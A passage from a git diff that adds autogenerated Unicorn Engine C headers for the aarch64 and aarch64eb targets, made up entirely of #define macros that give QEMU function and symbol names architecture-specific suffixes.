stl_phys_notdirty stl_phys_notdirty_aarch64 +#define store_cpu_offset store_cpu_offset_aarch64 +#define store_reg store_reg_aarch64 +#define store_reg_bx store_reg_bx_aarch64 +#define store_reg_from_load store_reg_from_load_aarch64 +#define stq_be_p stq_be_p_aarch64 +#define stq_be_phys stq_be_phys_aarch64 +#define stq_he_p stq_he_p_aarch64 +#define stq_le_p stq_le_p_aarch64 +#define stq_le_phys stq_le_phys_aarch64 +#define stq_phys stq_phys_aarch64 +#define string_input_get_visitor string_input_get_visitor_aarch64 +#define string_input_visitor_cleanup string_input_visitor_cleanup_aarch64 +#define string_input_visitor_new string_input_visitor_new_aarch64 +#define strongarm_cp_reginfo strongarm_cp_reginfo_aarch64 +#define strstart strstart_aarch64 +#define strtosz strtosz_aarch64 +#define strtosz_suffix strtosz_suffix_aarch64 +#define stw_be_p stw_be_p_aarch64 +#define stw_be_phys stw_be_phys_aarch64 +#define stw_he_p stw_he_p_aarch64 +#define stw_le_p stw_le_p_aarch64 +#define stw_le_phys stw_le_phys_aarch64 +#define stw_phys stw_phys_aarch64 +#define stw_phys_internal stw_phys_internal_aarch64 +#define sub128 sub128_aarch64 +#define sub16_sat sub16_sat_aarch64 +#define sub16_usat sub16_usat_aarch64 +#define sub192 sub192_aarch64 +#define sub8_sat sub8_sat_aarch64 +#define sub8_usat sub8_usat_aarch64 +#define subFloat128Sigs subFloat128Sigs_aarch64 +#define subFloat32Sigs subFloat32Sigs_aarch64 +#define subFloat64Sigs subFloat64Sigs_aarch64 +#define subFloatx80Sigs subFloatx80Sigs_aarch64 +#define subpage_accepts subpage_accepts_aarch64 +#define subpage_init subpage_init_aarch64 +#define subpage_ops subpage_ops_aarch64 +#define subpage_read subpage_read_aarch64 +#define subpage_register subpage_register_aarch64 +#define subpage_write subpage_write_aarch64 +#define suffix_mul suffix_mul_aarch64 +#define swap_commutative swap_commutative_aarch64 +#define swap_commutative2 swap_commutative2_aarch64 +#define switch_mode switch_mode_aarch64 +#define switch_v7m_sp switch_v7m_sp_aarch64 +#define syn_aa32_bkpt syn_aa32_bkpt_aarch64 +#define syn_aa32_hvc syn_aa32_hvc_aarch64 +#define syn_aa32_smc syn_aa32_smc_aarch64 +#define syn_aa32_svc syn_aa32_svc_aarch64 +#define syn_breakpoint syn_breakpoint_aarch64 +#define sync_globals sync_globals_aarch64 +#define syn_cp14_rrt_trap syn_cp14_rrt_trap_aarch64 +#define syn_cp14_rt_trap syn_cp14_rt_trap_aarch64 +#define syn_cp15_rrt_trap syn_cp15_rrt_trap_aarch64 +#define syn_cp15_rt_trap syn_cp15_rt_trap_aarch64 +#define syn_data_abort syn_data_abort_aarch64 +#define syn_fp_access_trap syn_fp_access_trap_aarch64 +#define syn_insn_abort syn_insn_abort_aarch64 +#define syn_swstep syn_swstep_aarch64 +#define syn_uncategorized syn_uncategorized_aarch64 +#define syn_watchpoint syn_watchpoint_aarch64 +#define syscall_err syscall_err_aarch64 +#define system_bus_class_init system_bus_class_init_aarch64 +#define system_bus_info system_bus_info_aarch64 +#define t2ee_cp_reginfo t2ee_cp_reginfo_aarch64 +#define table_logic_cc table_logic_cc_aarch64 +#define target_parse_constraint target_parse_constraint_aarch64 +#define target_words_bigendian target_words_bigendian_aarch64 +#define tb_add_jump tb_add_jump_aarch64 +#define tb_alloc tb_alloc_aarch64 +#define tb_alloc_page tb_alloc_page_aarch64 +#define tb_check_watchpoint tb_check_watchpoint_aarch64 +#define tb_find_fast tb_find_fast_aarch64 +#define tb_find_pc tb_find_pc_aarch64 +#define tb_find_slow tb_find_slow_aarch64 +#define tb_flush tb_flush_aarch64 +#define tb_flush_jmp_cache tb_flush_jmp_cache_aarch64 +#define tb_free tb_free_aarch64 +#define tb_gen_code tb_gen_code_aarch64 +#define tb_hash_remove tb_hash_remove_aarch64 +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_aarch64 +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_aarch64 +#define tb_invalidate_phys_range tb_invalidate_phys_range_aarch64 +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_aarch64 +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_aarch64 +#define tb_jmp_remove tb_jmp_remove_aarch64 +#define tb_link_page tb_link_page_aarch64 +#define tb_page_remove tb_page_remove_aarch64 +#define tb_phys_hash_func tb_phys_hash_func_aarch64 +#define tb_phys_invalidate tb_phys_invalidate_aarch64 +#define tb_reset_jump tb_reset_jump_aarch64 +#define tb_set_jmp_target tb_set_jmp_target_aarch64 +#define tcg_accel_class_init tcg_accel_class_init_aarch64 +#define tcg_accel_type tcg_accel_type_aarch64 +#define tcg_add_param_i32 tcg_add_param_i32_aarch64 +#define tcg_add_param_i64 tcg_add_param_i64_aarch64 +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_aarch64 +#define tcg_allowed tcg_allowed_aarch64 +#define tcg_canonicalize_memop tcg_canonicalize_memop_aarch64 +#define tcg_commit tcg_commit_aarch64 +#define tcg_cond_to_jcc tcg_cond_to_jcc_aarch64 +#define tcg_constant_folding tcg_constant_folding_aarch64 +#define tcg_const_i32 tcg_const_i32_aarch64 +#define tcg_const_i64 tcg_const_i64_aarch64 +#define tcg_const_local_i32 tcg_const_local_i32_aarch64 +#define tcg_const_local_i64 tcg_const_local_i64_aarch64 +#define tcg_context_init tcg_context_init_aarch64 +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_aarch64 +#define tcg_cpu_exec tcg_cpu_exec_aarch64 +#define tcg_current_code_size tcg_current_code_size_aarch64 +#define tcg_dump_info tcg_dump_info_aarch64 +#define tcg_dump_ops tcg_dump_ops_aarch64 +#define tcg_exec_all tcg_exec_all_aarch64 +#define tcg_find_helper tcg_find_helper_aarch64 +#define tcg_func_start tcg_func_start_aarch64 +#define tcg_gen_abs_i32 tcg_gen_abs_i32_aarch64 +#define tcg_gen_add2_i32 tcg_gen_add2_i32_aarch64 +#define tcg_gen_add_i32 tcg_gen_add_i32_aarch64 +#define tcg_gen_add_i64 tcg_gen_add_i64_aarch64 +#define tcg_gen_addi_i32 tcg_gen_addi_i32_aarch64 +#define tcg_gen_addi_i64 tcg_gen_addi_i64_aarch64 +#define tcg_gen_andc_i32 tcg_gen_andc_i32_aarch64 +#define tcg_gen_and_i32 tcg_gen_and_i32_aarch64 +#define tcg_gen_and_i64 tcg_gen_and_i64_aarch64 +#define tcg_gen_andi_i32 tcg_gen_andi_i32_aarch64 +#define tcg_gen_andi_i64 tcg_gen_andi_i64_aarch64 +#define tcg_gen_br tcg_gen_br_aarch64 +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_aarch64 +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_aarch64 +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_aarch64 +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_aarch64 +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_aarch64 +#define tcg_gen_callN tcg_gen_callN_aarch64 +#define tcg_gen_code tcg_gen_code_aarch64 +#define tcg_gen_code_common tcg_gen_code_common_aarch64 +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_aarch64 +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_aarch64 +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_aarch64 +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_aarch64 +#define tcg_gen_exit_tb tcg_gen_exit_tb_aarch64 +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_aarch64 +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_aarch64 +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_aarch64 +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_aarch64 +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_aarch64 +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_aarch64 +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_aarch64 +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_aarch64 +#define tcg_gen_goto_tb tcg_gen_goto_tb_aarch64 +#define tcg_gen_ld_i32 tcg_gen_ld_i32_aarch64 +#define tcg_gen_ld_i64 tcg_gen_ld_i64_aarch64 +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_aarch64 +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_aarch64 +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_aarch64 +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_aarch64 +#define tcg_gen_mov_i32 tcg_gen_mov_i32_aarch64 +#define tcg_gen_mov_i64 tcg_gen_mov_i64_aarch64 +#define tcg_gen_movi_i32 tcg_gen_movi_i32_aarch64 +#define tcg_gen_movi_i64 tcg_gen_movi_i64_aarch64 +#define tcg_gen_mul_i32 tcg_gen_mul_i32_aarch64 +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_aarch64 +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_aarch64 +#define tcg_gen_neg_i32 tcg_gen_neg_i32_aarch64 +#define tcg_gen_neg_i64 tcg_gen_neg_i64_aarch64 +#define tcg_gen_not_i32 tcg_gen_not_i32_aarch64 +#define tcg_gen_op0 tcg_gen_op0_aarch64 +#define tcg_gen_op1i tcg_gen_op1i_aarch64 +#define tcg_gen_op2_i32 tcg_gen_op2_i32_aarch64 +#define tcg_gen_op2_i64 tcg_gen_op2_i64_aarch64 +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_aarch64 +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_aarch64 +#define tcg_gen_op3_i32 tcg_gen_op3_i32_aarch64 +#define tcg_gen_op3_i64 tcg_gen_op3_i64_aarch64 +#define tcg_gen_op4_i32 tcg_gen_op4_i32_aarch64 +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_aarch64 +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_aarch64 +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_aarch64 +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_aarch64 +#define tcg_gen_op6_i32 tcg_gen_op6_i32_aarch64 +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_aarch64 +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_aarch64 +#define tcg_gen_orc_i32 tcg_gen_orc_i32_aarch64 +#define tcg_gen_or_i32 tcg_gen_or_i32_aarch64 +#define tcg_gen_or_i64 tcg_gen_or_i64_aarch64 +#define tcg_gen_ori_i32 tcg_gen_ori_i32_aarch64 +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_aarch64 +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_aarch64 +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_aarch64 +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_aarch64 +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_aarch64 +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_aarch64 +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_aarch64 +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_aarch64 +#define tcg_gen_sar_i32 tcg_gen_sar_i32_aarch64 +#define tcg_gen_sari_i32 tcg_gen_sari_i32_aarch64 +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_aarch64 +#define tcg_gen_shl_i32 tcg_gen_shl_i32_aarch64 +#define tcg_gen_shl_i64 tcg_gen_shl_i64_aarch64 +#define tcg_gen_shli_i32 tcg_gen_shli_i32_aarch64 +#define tcg_gen_shli_i64 tcg_gen_shli_i64_aarch64 +#define tcg_gen_shr_i32 tcg_gen_shr_i32_aarch64 +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_aarch64 +#define tcg_gen_shr_i64 tcg_gen_shr_i64_aarch64 +#define tcg_gen_shri_i32 tcg_gen_shri_i32_aarch64 +#define tcg_gen_shri_i64 tcg_gen_shri_i64_aarch64 +#define tcg_gen_st_i32 tcg_gen_st_i32_aarch64 +#define tcg_gen_st_i64 tcg_gen_st_i64_aarch64 +#define tcg_gen_sub_i32 tcg_gen_sub_i32_aarch64 +#define tcg_gen_sub_i64 tcg_gen_sub_i64_aarch64 +#define tcg_gen_subi_i32 tcg_gen_subi_i32_aarch64 +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_aarch64 +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_aarch64 +#define tcg_gen_xor_i32 tcg_gen_xor_i32_aarch64 +#define tcg_gen_xor_i64 tcg_gen_xor_i64_aarch64 +#define tcg_gen_xori_i32 tcg_gen_xori_i32_aarch64 +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_aarch64 +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_aarch64 +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_aarch64 +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_aarch64 +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_aarch64 +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_aarch64 +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_aarch64 +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_aarch64 +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_aarch64 +#define tcg_handle_interrupt tcg_handle_interrupt_aarch64 +#define tcg_init tcg_init_aarch64 +#define tcg_invert_cond tcg_invert_cond_aarch64 +#define tcg_la_bb_end tcg_la_bb_end_aarch64 +#define tcg_la_br_end tcg_la_br_end_aarch64 +#define tcg_la_func_end tcg_la_func_end_aarch64 +#define tcg_liveness_analysis tcg_liveness_analysis_aarch64 +#define tcg_malloc tcg_malloc_aarch64 +#define tcg_malloc_internal tcg_malloc_internal_aarch64 +#define tcg_op_defs_org tcg_op_defs_org_aarch64 +#define tcg_opt_gen_mov tcg_opt_gen_mov_aarch64 +#define tcg_opt_gen_movi tcg_opt_gen_movi_aarch64 +#define tcg_optimize tcg_optimize_aarch64 +#define tcg_out16 tcg_out16_aarch64 +#define tcg_out32 tcg_out32_aarch64 +#define tcg_out64 tcg_out64_aarch64 +#define tcg_out8 tcg_out8_aarch64 +#define tcg_out_addi tcg_out_addi_aarch64 +#define tcg_out_branch tcg_out_branch_aarch64 +#define tcg_out_brcond32 tcg_out_brcond32_aarch64 +#define tcg_out_brcond64 tcg_out_brcond64_aarch64 +#define tcg_out_bswap32 tcg_out_bswap32_aarch64 +#define tcg_out_bswap64 tcg_out_bswap64_aarch64 +#define tcg_out_call tcg_out_call_aarch64 +#define tcg_out_cmp tcg_out_cmp_aarch64 +#define tcg_out_ext16s tcg_out_ext16s_aarch64 +#define tcg_out_ext16u tcg_out_ext16u_aarch64 +#define tcg_out_ext32s tcg_out_ext32s_aarch64 +#define tcg_out_ext32u tcg_out_ext32u_aarch64 +#define tcg_out_ext8s tcg_out_ext8s_aarch64 +#define tcg_out_ext8u tcg_out_ext8u_aarch64 +#define tcg_out_jmp tcg_out_jmp_aarch64 +#define tcg_out_jxx tcg_out_jxx_aarch64 +#define tcg_out_label tcg_out_label_aarch64 +#define tcg_out_ld tcg_out_ld_aarch64 +#define tcg_out_modrm tcg_out_modrm_aarch64 +#define tcg_out_modrm_offset tcg_out_modrm_offset_aarch64 +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_aarch64 +#define tcg_out_mov tcg_out_mov_aarch64 +#define tcg_out_movcond32 tcg_out_movcond32_aarch64 +#define tcg_out_movcond64 tcg_out_movcond64_aarch64 +#define tcg_out_movi tcg_out_movi_aarch64 +#define tcg_out_op tcg_out_op_aarch64 +#define tcg_out_pop tcg_out_pop_aarch64 +#define tcg_out_push tcg_out_push_aarch64 +#define tcg_out_qemu_ld tcg_out_qemu_ld_aarch64 +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_aarch64 +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_aarch64 +#define tcg_out_qemu_st tcg_out_qemu_st_aarch64 +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_aarch64 +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_aarch64 +#define tcg_out_reloc tcg_out_reloc_aarch64 +#define tcg_out_rolw_8 tcg_out_rolw_8_aarch64 +#define tcg_out_setcond32 tcg_out_setcond32_aarch64 +#define tcg_out_setcond64 tcg_out_setcond64_aarch64 +#define tcg_out_shifti tcg_out_shifti_aarch64 +#define tcg_out_st tcg_out_st_aarch64 +#define tcg_out_tb_finalize tcg_out_tb_finalize_aarch64 +#define tcg_out_tb_init tcg_out_tb_init_aarch64 +#define tcg_out_tlb_load tcg_out_tlb_load_aarch64 +#define tcg_out_vex_modrm tcg_out_vex_modrm_aarch64 +#define tcg_patch32 tcg_patch32_aarch64 +#define tcg_patch8 tcg_patch8_aarch64 +#define tcg_pcrel_diff tcg_pcrel_diff_aarch64 +#define tcg_pool_reset tcg_pool_reset_aarch64 +#define tcg_prologue_init tcg_prologue_init_aarch64 +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_aarch64 +#define tcg_reg_alloc tcg_reg_alloc_aarch64 +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_aarch64 +#define tcg_reg_alloc_call tcg_reg_alloc_call_aarch64 +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_aarch64 +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_aarch64 +#define tcg_reg_alloc_op tcg_reg_alloc_op_aarch64 +#define tcg_reg_alloc_start tcg_reg_alloc_start_aarch64 +#define tcg_reg_free tcg_reg_free_aarch64 +#define tcg_reg_sync tcg_reg_sync_aarch64 +#define tcg_set_frame tcg_set_frame_aarch64 +#define tcg_set_nop tcg_set_nop_aarch64 +#define tcg_swap_cond tcg_swap_cond_aarch64 +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_aarch64 +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_aarch64 +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_aarch64 +#define tcg_target_const_match tcg_target_const_match_aarch64 +#define tcg_target_init tcg_target_init_aarch64 +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_aarch64 +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_aarch64 +#define tcg_temp_alloc tcg_temp_alloc_aarch64 +#define tcg_temp_free_i32 tcg_temp_free_i32_aarch64 +#define tcg_temp_free_i64 tcg_temp_free_i64_aarch64 +#define tcg_temp_free_internal tcg_temp_free_internal_aarch64 +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_aarch64 +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_aarch64 +#define tcg_temp_new_i32 tcg_temp_new_i32_aarch64 +#define tcg_temp_new_i64 tcg_temp_new_i64_aarch64 +#define tcg_temp_new_internal tcg_temp_new_internal_aarch64 +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_aarch64 +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_aarch64 +#define tdb_hash tdb_hash_aarch64 +#define teecr_write teecr_write_aarch64 +#define teehbr_access teehbr_access_aarch64 +#define temp_allocate_frame temp_allocate_frame_aarch64 +#define temp_dead temp_dead_aarch64 +#define temps_are_copies temps_are_copies_aarch64 +#define temp_save temp_save_aarch64 +#define temp_sync temp_sync_aarch64 +#define tgen_arithi tgen_arithi_aarch64 +#define tgen_arithr tgen_arithr_aarch64 +#define thumb2_logic_op thumb2_logic_op_aarch64 +#define ti925t_initfn ti925t_initfn_aarch64 +#define tlb_add_large_page tlb_add_large_page_aarch64 +#define tlb_flush_entry tlb_flush_entry_aarch64 +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_aarch64 +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_aarch64 +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_aarch64 +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_aarch64 +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_aarch64 +#define tlbi_aa64_va_write tlbi_aa64_va_write_aarch64 +#define tlbiall_is_write tlbiall_is_write_aarch64 +#define tlbiall_write tlbiall_write_aarch64 +#define tlbiasid_is_write tlbiasid_is_write_aarch64 +#define tlbiasid_write tlbiasid_write_aarch64 +#define tlbimvaa_is_write tlbimvaa_is_write_aarch64 +#define tlbimvaa_write tlbimvaa_write_aarch64 +#define tlbimva_is_write tlbimva_is_write_aarch64 +#define tlbimva_write tlbimva_write_aarch64 +#define tlb_is_dirty_ram tlb_is_dirty_ram_aarch64 +#define tlb_protect_code tlb_protect_code_aarch64 +#define tlb_reset_dirty_range tlb_reset_dirty_range_aarch64 +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_aarch64 +#define tlb_set_dirty tlb_set_dirty_aarch64 +#define tlb_set_dirty1 tlb_set_dirty1_aarch64 +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_aarch64 +#define tlb_vaddr_to_host tlb_vaddr_to_host_aarch64 +#define token_get_type token_get_type_aarch64 +#define token_get_value token_get_value_aarch64 +#define token_is_escape token_is_escape_aarch64 +#define token_is_keyword token_is_keyword_aarch64 +#define token_is_operator token_is_operator_aarch64 +#define tokens_append_from_iter tokens_append_from_iter_aarch64 +#define to_qiv to_qiv_aarch64 +#define to_qov to_qov_aarch64 +#define tosa_init tosa_init_aarch64 +#define tosa_machine_init tosa_machine_init_aarch64 +#define tswap32 tswap32_aarch64 +#define tswap64 tswap64_aarch64 +#define type_class_get_size type_class_get_size_aarch64 +#define type_get_by_name type_get_by_name_aarch64 +#define type_get_parent type_get_parent_aarch64 +#define type_has_parent type_has_parent_aarch64 +#define type_initialize type_initialize_aarch64 +#define type_initialize_interface type_initialize_interface_aarch64 +#define type_is_ancestor type_is_ancestor_aarch64 +#define type_new type_new_aarch64 +#define type_object_get_size type_object_get_size_aarch64 +#define type_register_internal type_register_internal_aarch64 +#define type_table_add type_table_add_aarch64 +#define type_table_get type_table_get_aarch64 +#define type_table_lookup type_table_lookup_aarch64 +#define uint16_to_float32 uint16_to_float32_aarch64 +#define uint16_to_float64 uint16_to_float64_aarch64 +#define uint32_to_float32 uint32_to_float32_aarch64 +#define uint32_to_float64 uint32_to_float64_aarch64 +#define uint64_to_float128 uint64_to_float128_aarch64 +#define uint64_to_float32 uint64_to_float32_aarch64 +#define uint64_to_float64 uint64_to_float64_aarch64 +#define unassigned_io_ops unassigned_io_ops_aarch64 +#define unassigned_io_read unassigned_io_read_aarch64 +#define unassigned_io_write unassigned_io_write_aarch64 +#define unassigned_mem_accepts unassigned_mem_accepts_aarch64 +#define unassigned_mem_ops unassigned_mem_ops_aarch64 +#define unassigned_mem_read unassigned_mem_read_aarch64 +#define unassigned_mem_write unassigned_mem_write_aarch64 +#define update_spsel update_spsel_aarch64 +#define v6_cp_reginfo v6_cp_reginfo_aarch64 +#define v6k_cp_reginfo v6k_cp_reginfo_aarch64 +#define v7_cp_reginfo v7_cp_reginfo_aarch64 +#define v7mp_cp_reginfo v7mp_cp_reginfo_aarch64 +#define v7m_pop v7m_pop_aarch64 +#define v7m_push v7m_push_aarch64 +#define v8_cp_reginfo v8_cp_reginfo_aarch64 +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_aarch64 +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_aarch64 +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_aarch64 +#define vapa_cp_reginfo vapa_cp_reginfo_aarch64 +#define vbar_write vbar_write_aarch64 +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_aarch64 +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_aarch64 +#define vfp_get_fpcr vfp_get_fpcr_aarch64 +#define vfp_get_fpscr vfp_get_fpscr_aarch64 +#define vfp_get_fpsr vfp_get_fpsr_aarch64 +#define vfp_reg_offset vfp_reg_offset_aarch64 +#define vfp_set_fpcr vfp_set_fpcr_aarch64 +#define vfp_set_fpscr vfp_set_fpscr_aarch64 +#define vfp_set_fpsr vfp_set_fpsr_aarch64 +#define visit_end_implicit_struct visit_end_implicit_struct_aarch64 +#define visit_end_list visit_end_list_aarch64 +#define visit_end_struct visit_end_struct_aarch64 +#define visit_end_union visit_end_union_aarch64 +#define visit_get_next_type visit_get_next_type_aarch64 +#define visit_next_list visit_next_list_aarch64 +#define visit_optional visit_optional_aarch64 +#define visit_start_implicit_struct visit_start_implicit_struct_aarch64 +#define visit_start_list visit_start_list_aarch64 +#define visit_start_struct visit_start_struct_aarch64 +#define visit_start_union visit_start_union_aarch64 +#define vmsa_cp_reginfo vmsa_cp_reginfo_aarch64 +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_aarch64 +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_aarch64 +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_aarch64 +#define vmsa_ttbcr_write vmsa_ttbcr_write_aarch64 +#define vmsa_ttbr_write vmsa_ttbr_write_aarch64 +#define write_cpustate_to_list write_cpustate_to_list_aarch64 +#define write_list_to_cpustate write_list_to_cpustate_aarch64 +#define write_raw_cp_reg write_raw_cp_reg_aarch64 +#define X86CPURegister32_lookup X86CPURegister32_lookup_aarch64 +#define x86_op_defs x86_op_defs_aarch64 +#define xpsr_read xpsr_read_aarch64 +#define xpsr_write xpsr_write_aarch64 +#define xscale_cpar_write xscale_cpar_write_aarch64 +#define xscale_cp_reginfo xscale_cp_reginfo_aarch64 +#define ARM64_REGS_STORAGE_SIZE ARM64_REGS_STORAGE_SIZE_aarch64 +#define arm64_release arm64_release_aarch64 +#define arm64_reg_reset arm64_reg_reset_aarch64 +#define arm64_reg_read arm64_reg_read_aarch64 +#define arm64_reg_write arm64_reg_write_aarch64 +#define gen_a64_set_pc_im gen_a64_set_pc_im_aarch64 +#define aarch64_cpu_register_types aarch64_cpu_register_types_aarch64 +#define helper_udiv64 helper_udiv64_aarch64 +#define helper_sdiv64 helper_sdiv64_aarch64 +#define helper_cls64 helper_cls64_aarch64 +#define helper_cls32 helper_cls32_aarch64 +#define helper_rbit64 helper_rbit64_aarch64 +#define helper_vfp_cmps_a64 helper_vfp_cmps_a64_aarch64 +#define helper_vfp_cmpes_a64 helper_vfp_cmpes_a64_aarch64 +#define helper_vfp_cmpd_a64 helper_vfp_cmpd_a64_aarch64 +#define helper_vfp_cmped_a64 helper_vfp_cmped_a64_aarch64 +#define helper_vfp_mulxs helper_vfp_mulxs_aarch64 +#define helper_vfp_mulxd helper_vfp_mulxd_aarch64 +#define helper_simd_tbl helper_simd_tbl_aarch64 +#define helper_neon_ceq_f64 helper_neon_ceq_f64_aarch64 +#define helper_neon_cge_f64 helper_neon_cge_f64_aarch64 +#define helper_neon_cgt_f64 helper_neon_cgt_f64_aarch64 +#define helper_recpsf_f32 helper_recpsf_f32_aarch64 +#define helper_recpsf_f64 helper_recpsf_f64_aarch64 +#define helper_rsqrtsf_f32 helper_rsqrtsf_f32_aarch64 +#define helper_rsqrtsf_f64 helper_rsqrtsf_f64_aarch64 +#define helper_neon_addlp_s8 helper_neon_addlp_s8_aarch64 +#define helper_neon_addlp_u8 helper_neon_addlp_u8_aarch64 +#define helper_neon_addlp_s16 helper_neon_addlp_s16_aarch64 +#define helper_neon_addlp_u16 helper_neon_addlp_u16_aarch64 +#define helper_frecpx_f32 helper_frecpx_f32_aarch64 +#define helper_frecpx_f64 helper_frecpx_f64_aarch64 +#define helper_fcvtx_f64_to_f32 helper_fcvtx_f64_to_f32_aarch64 +#define helper_crc32_64 helper_crc32_64_aarch64 +#define helper_crc32c_64 helper_crc32c_64_aarch64 +#define aarch64_cpu_do_interrupt aarch64_cpu_do_interrupt_aarch64 +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/aarch64eb.h b/ai_anti_malware/unicorn/unicorn-master/qemu/aarch64eb.h new file mode 100644 index 0000000..fbdb37a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/aarch64eb.h @@ -0,0 +1,3056 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_AARCH64EB_H +#define UNICORN_AUTOGEN_AARCH64EB_H +#define arm_release arm_release_aarch64eb +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_aarch64eb +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_aarch64eb +#define use_idiv_instructions_rt use_idiv_instructions_rt_aarch64eb +#define tcg_target_deposit_valid tcg_target_deposit_valid_aarch64eb +#define helper_power_down helper_power_down_aarch64eb +#define check_exit_request check_exit_request_aarch64eb +#define address_space_unregister address_space_unregister_aarch64eb +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_aarch64eb +#define phys_mem_clean phys_mem_clean_aarch64eb +#define tb_cleanup tb_cleanup_aarch64eb +#define memory_map memory_map_aarch64eb +#define memory_map_ptr memory_map_ptr_aarch64eb +#define memory_unmap memory_unmap_aarch64eb +#define memory_free memory_free_aarch64eb +#define free_code_gen_buffer free_code_gen_buffer_aarch64eb +#define helper_raise_exception helper_raise_exception_aarch64eb +#define tcg_enabled tcg_enabled_aarch64eb +#define tcg_exec_init tcg_exec_init_aarch64eb +#define memory_register_types memory_register_types_aarch64eb +#define cpu_exec_init_all cpu_exec_init_all_aarch64eb +#define vm_start vm_start_aarch64eb +#define resume_all_vcpus resume_all_vcpus_aarch64eb +#define a15_l2ctlr_read a15_l2ctlr_read_aarch64eb +#define a64_translate_init a64_translate_init_aarch64eb +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_aarch64eb +#define aa64_cacheop_access aa64_cacheop_access_aarch64eb +#define 